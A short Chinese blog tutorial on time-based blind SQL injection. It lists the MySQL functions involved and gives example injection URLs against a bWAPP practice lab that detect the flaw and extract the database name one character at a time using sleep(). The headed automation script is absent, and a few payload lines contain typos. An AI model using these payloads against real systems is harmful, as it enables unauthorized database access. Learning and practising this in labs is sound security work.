本文最后更新于:2021年1月20日 晚上
时间盲注
时间盲注常用函数
substr(a,b,c):从b位置开始,截取字符串a的c长度
count():计算总数
ascii():返回字符的ASCII码
length():返回字符串的长度
left(a,b):从左到右截取字符串a的前b个字符
sleep(n):将程序挂起n秒
时间盲注实战
World War Z电影存在
# 判断是否存在时间盲注
http://bwapp.com:8888/sqli_15.php?title=World War Z' and sleep(2)-- &action=search
# 判断数据库名长度
http://bwapp.com:8888/sqli_15.php?title=World War Z' and length(database()) > 5 and sleep(2)-- &action=search
# 利用substr函数遍历数据库名称字符,比如下面通过时间盲注判断数据库的第一个字符是不是b
http://bwapp.com:8888/sqli_15.php?title=World War Z' and substr(database(),1,1) = 'b' and sleep(2)-- &action=search
# 自动化检测
# 通过程序比较,数字的运算会更加快速方便,将字符串转换为ascii码进行对比
http://bwapp.com:8888/sqli_15.php?title=World War Z' and ascii(substr(database(),1,1))=1 and sl eep(2)-- aaction=search
http://bwapp.com:8888/sqli_15.php?title=World War Z' and ascii(substr(database(),1,1))=98 and sleep(2)-- aaction=search
# 自动化遍历数据库名、内容脚本
本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!